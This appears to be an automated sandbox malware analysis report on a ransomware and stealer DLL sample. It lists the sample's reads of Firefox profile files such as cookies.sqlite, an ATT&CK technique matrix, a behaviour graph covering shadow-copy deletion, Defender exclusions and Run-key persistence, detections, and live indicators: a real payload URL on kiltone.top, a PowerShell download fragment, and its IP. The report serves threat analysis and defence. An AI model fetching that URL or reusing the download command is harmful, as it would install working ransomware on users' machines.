Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\ExperimentStoreData.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\xulstore.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\612c12d3-948f-48f6-91fb-d0d8ccda0670Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\AlternateServices.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\background-updateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\975fa64d-84a3-45a6-931b-6d9e916c1153Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\1036486f-a56a-437b-b1e7-a2f1fa5fb914Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\b5870d07-97bf-4bf9-a21f-d4715e2d8984Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\036d0311-0554-4100-9fa8-d932e8d08b3aJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\6830e690-c9e2-4163-804c-2e4b4f66b5a1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\handlers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\favicons.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\previous.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\3026813b-3a35-4f80-9cae-dbfc31ca1561Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\pkcs11.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\webappsstore.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493971736.1d0a55ec-8147-406f-a800-14c2abac24f9.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\7838fbf6-8c2c-41db-82b4-de4fd94ddc30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\parent.lockJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\search.json.mozlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\shield-preference-experiments.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\ls-archive.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\878d3b18-7365-4283-b9d4-9d57cf8fbefdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\permissions.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\protections.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966547.008ede48-c825-4f89-a2a2-325df2c42c07.first-shutdown.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\times.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\68582a3e-63c9-4674-9a87-c796e9492d98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\cda89272-a9f9-47ec-8bfb-229c7c5839c5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\1696493966543.975fa64d-84a3-45a6-931b-6d9e916c1153.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\extension-preferences.jsonJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
1
System Time Discovery
Remote Services11
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts1
Native API
21
Registry Run Keys / Startup Folder
1
Access Token Manipulation
1
Deobfuscate/Decode Files or Information
LSASS Memory4
File and Directory Discovery
Remote Desktop Protocol1
Browser Session Hijacking
21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)11
Process Injection
2
Obfuscated Files or Information
Security Account Manager32
System Information Discovery
SMB/Windows Admin Shares1
Data from Local System
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
Registry Run Keys / Startup Folder
1
DLL Side-Loading
NTDS241
Security Software Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion
LSA Secrets31
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Masquerading
Cached Domain Credentials2
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
Virtualization/Sandbox Evasion
Proc Filesystem1
Remote System Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation
/etc/passwd and /etc/shadow1
System Network Configuration Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
Process Injection
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Rundll32
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575339 Sample: TD2HjoogPx.dll Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 105 kiltone.top 2->105 109 Multi AV Scanner detection for domain / URL 2->109 111 Antivirus detection for URL or domain 2->111 113 Multi AV Scanner detection for submitted file 2->113 115 7 other signatures 2->115 11 eryy65ty.exe 548 2->11         started        15 loaddll32.exe 1 2->15         started        17 eryy65ty.exe 2->17         started        19 notepad.exe 2->19         started        signatures3 process4 file5 87 C:\Users\user\...\Amazon.url.jIQf (copy), DOS 11->87 dropped 89 C:\Users\user\Favorites\Amazon.url, DOS 11->89 dropped 91 C:\Users\user\...\addons.json.xHAg (copy), DOS 11->91 dropped 93 133 other malicious files 11->93 dropped 127 Deletes shadow drive data (may be related to ransomware) 11->127 129 May encrypt documents and pictures (Ransomware) 11->129 131 Overwrites Mozilla Firefox settings 11->131 133 Tries to harvest and steal browser information (history, passwords, etc) 11->133 21 cmd.exe 11->21         started        24 WMIC.exe 11->24         started        26 WMIC.exe 11->26         started        135 Adds a directory exclusion to Windows Defender 15->135 28 cmd.exe 15->28         started        30 cmd.exe 1 15->30         started        32 cmd.exe 1 15->32         started        36 2 other processes 15->36 34 cmd.exe 17->34         started        38 2 other processes 17->38 signatures6 process7 signatures8 55 2 other processes 21->55 40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        44 eryy65ty.exe 4 25 28->44         started        117 Suspicious powershell command line found 30->117 119 Uses ping.exe to sleep 30->119 121 Uses ping.exe to check the status of other devices and networks 30->121 48 rundll32.exe 30->48         started        123 Adds a directory exclusion to Windows Defender 32->123 50 powershell.exe 23 32->50         started        57 2 other processes 34->57 52 powershell.exe 15 16 36->52         started        59 2 other processes 38->59 process9 dnsIp10 95 C:\Users\user\...95EBFQQYWPS.docx.epiF (copy), DOS 44->95 dropped 97 C:\Users\user\Desktop\...97EBFQQYWPS.docx, DOS 44->97 dropped 99 C:\Users\user\...\SQSJKEBWDT.jpg.ylkf (copy), COM 44->99 dropped 103 4 other malicious files 44->103 dropped 137 Multi AV Scanner detection for dropped file 44->137 139 Machine Learning detection for dropped file 44->139 141 Deletes shadow drive data (may be related to ransomware) 44->141 149 3 other signatures 44->149 61 WMIC.exe 1 44->61         started        143 Adds a directory exclusion to Windows Defender 48->143 63 cmd.exe 48->63         started        66 cmd.exe 48->66         started        68 cmd.exe 1 48->68         started        145 Loading BitLocker PowerShell Module 50->145 147 Powershell drops PE file 50->147 107 kiltone.top 45.125.67.168, 443, 49706, 49707 TELE-ASTeleAsiaLimitedHK Hong Kong 52->107 101 C:\Users\user\AppData\Local\...\eryy65ty.exe, PE32 52->101 dropped 70 conhost.exe 52->70         started        file11 signatures12 process13 signatures14 72 conhost.exe 61->72         started        151 Adds a directory exclusion to Windows Defender 63->151 74 powershell.exe 63->74         started        77 conhost.exe 63->77         started        153 Suspicious powershell command line found 66->153 79 conhost.exe 66->79         started        81 powershell.exe 66->81         started        83 conhost.exe 68->83         started        process15 signatures16 125 Loading BitLocker PowerShell Module 74->125 85 WmiPrvSE.exe 74->85         started        process17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
TD2HjoogPx.dll44%VirustotalBrowse
TD2HjoogPx.dll37%ReversingLabsWin32.Trojan.Doina
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\eryy65ty.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\eryy65ty.exe45%ReversingLabsWin32.Trojan.Nekark
C:\Users\user\AppData\Local\Temp\eryy65ty.exe67%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
kiltone.top4%VirustotalBrowse
SourceDetectionScannerLabelLink
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp0%Avira URL Cloudsafe
https://kiltone.top/stelin/Gosjeufon.cpl100%Avira URL Cloudmalware
https://kiltone.top/stelin/Gosjeufon.cpl11%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
kiltone.top
45.125.67.168
truetrueunknown
NameMaliciousAntivirus DetectionReputation
https://kiltone.top/stelin/Gosjeufon.cpltrue
  • 11%, Virustotal, Browse
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://www.avito.ru/3870112724rsegmnoittet-es.sqlite.27.drfalse
    high
    https://digify.com/a/#/access/loginloaddll32.exe, loaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, loaddll32.exe, 00000000.00000002.2671467512.000000000160F000.00000004.00000020.00020000.00000000.sdmp, TD2HjoogPx.dllfalse
      high
      https://www.ctrip.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
        high
        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYiprefs.js.27.drfalse
          high
          https://www.leboncoin.fr/3870112724rsegmnoittet-es.sqlite.27.drfalse
            high
            https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmpcmd.exe, 0000000B.00000002.1578519610.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1563802595.0000000002B90000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://account.bellmedia.c3870112724rsegmnoittet-es.sqlite.27.drfalse
              high
              https://weibo.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                high
                https://login.microsoftonline.com3870112724rsegmnoittet-es.sqlite.27.drfalse
                  high
                  https://www.ifeng.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                    high
                    https://www.zhihu.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                      high
                      http://x1.c.lencr.org/0cert9.db.27.drfalse
                        high
                        http://x1.i.lencr.org/0cert9.db.27.drfalse
                          high
                          https://www.msn.com3870112724rsegmnoittet-es.sqlite.27.drfalse
                            high
                            https://www.reddit.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                              high
                              https://www.amazon.ca/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                high
                                https://www.ebay.co.uk/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                  high
                                  https://github.com/mozilla/webcompat-reporterextensions.json.27.drfalse
                                    high
                                    https://www.amazon.co.uk/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                      high
                                      https://www.ebay.de/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                        high
                                        https://screenshots.firefox.com/extensions.json.27.drfalse
                                          high
                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lplaces.sqlite.27.drfalse
                                            high
                                            https://www.amazon.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                              high
                                              https://www.google.com/search?client=firefox-b-d&q=1d0a55ec-8147-406f-a800-14c2abac24f9.27.dr, 1912e5a9-a49a-44a5-95c6-6e047a7410c8.27.dr, 975fa64d-84a3-45a6-931b-6d9e916c1153.27.drfalse
                                                high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.27.drfalse
                                                  high
                                                  http://ocsp.rootca1.amazontrust.com0:cert9.db.27.drfalse
                                                    high
                                                    https://www.wykop.pl/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                      high
                                                      https://twitter.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                        high
                                                        https://digify.com/a/#/access/logincmdloaddll32.exe, 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmp, TD2HjoogPx.dllfalse
                                                          high
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brplaces.sqlite.27.drfalse
                                                            high
                                                            https://www.olx.pl/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                              high
                                                              https://www.youtube.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                high
                                                                https://allegro.pl/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxfavicons.sqlite.27.drfalse
                                                                    high
                                                                    https://MD8.mozilla.org/1/m3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                      high
                                                                      https://www.bbc.co.uk/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                        high
                                                                        https://bugzilla.mo3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                          high
                                                                          https://www.amazon.fr/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                            high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.27.drfalse
                                                                              high
                                                                              https://www.google.com/complete/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                                high
                                                                                https://www.google.com/search?client=firefox-b-d&q=&metrics#search.engine.default.verifieddata.safe.bin.27.drfalse
                                                                                  high
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgprefs.js.27.drfalse
                                                                                    high
                                                                                    https://support.mozilla.orgplaces.sqlite.27.drfalse
                                                                                      high
                                                                                      https://www.google.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                                        high
                                                                                        https://www.google.com/search?client=firefox-b-d&q=&data.safe.bin.27.drfalse
                                                                                          high
                                                                                          https://www.iqiyi.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                                            high
                                                                                            https://www.amazon.de/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                                              high
                                                                                              https://www.baidu.com/3870112724rsegmnoittet-es.sqlite.27.drfalse
                                                                                                high
                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs
                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                45.125.67.168
                                                                                                kiltone.topHong Kong
                                                                                                133398TELE-ASTeleAsiaLimitedHKtrue
                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                Analysis ID:1575339
                                                                                                Start date and time:2024-12-15 09:26:26 +01:00
                                                                                                Joe Sandbox product:CloudBasic
                                                                                                Overall analysis duration:0h 8m 9s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                Number of analysed new started processes analysed:53
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:0
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Sample name:TD2HjoogPx.dll
                                                                                                renamed because original name is a hash value
                                                                                                Original Sample Name:fccd129f6a5b9d2133d14922a3614f02.dll
                                                                                                Detection:MAL
                                                                                                Classification:mal100.rans.phis.troj.spyw.evad.winDLL@62/710@1/1
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 100%
                                                                                                • Number of executed functions: 58
                                                                                                • Number of non-executed functions: 170
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .dll
                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, svchost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                TimeTypeDescription
                                                                                                03:27:28API Interceptor109x Sleep call for process: powershell.exe modified
                                                                                                03:27:36API Interceptor1x Sleep call for process: rundll32.exe modified
                                                                                                03:27:37API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                03:27:43API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                03:28:19API Interceptor5x Sleep call for process: eryy65ty.exe modified
                                                                                                09:27:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                09:27:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XPSUDTARW C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                09:28:24AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                45.125.67.168NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  kiltone.topNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.67.168
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  TELE-ASTeleAsiaLimitedHKNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.67.168
                                                                                                  R7bv9d6gTH.dllGet hashmaliciousUnknownBrowse
                                                                                                  • 103.253.43.248
                                                                                                  http://9089357365.com/Get hashmaliciousPhisherBrowse
                                                                                                  • 45.125.65.213
                                                                                                  UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.66.18
                                                                                                  UBONg7lmVR.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.66.18
                                                                                                  1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.66.18
                                                                                                  V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.66.18
                                                                                                  V6ZsDcgx4N.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.66.18
                                                                                                  https://57365oo.cc/Get hashmaliciousPhisherBrowse
                                                                                                  • 45.125.65.213
                                                                                                  zte.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.66.78
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ewmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  • 45.125.67.168
                                                                                                  LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                                                                                  • 45.125.67.168
                                                                                                  Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                  • 45.125.67.168
                                                                                                  Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                  • 45.125.67.168
                                                                                                  RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                  • 45.125.67.168
                                                                                                  FEDEX234598765.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                  • 45.125.67.168
                                                                                                  3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                  • 45.125.67.168
                                                                                                  NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                  • 45.125.67.168
                                                                                                  PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                  • 45.125.67.168
                                                                                                  Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 45.125.67.168
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  C:\Users\user\AppData\Local\Temp\eryy65ty.exeNOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
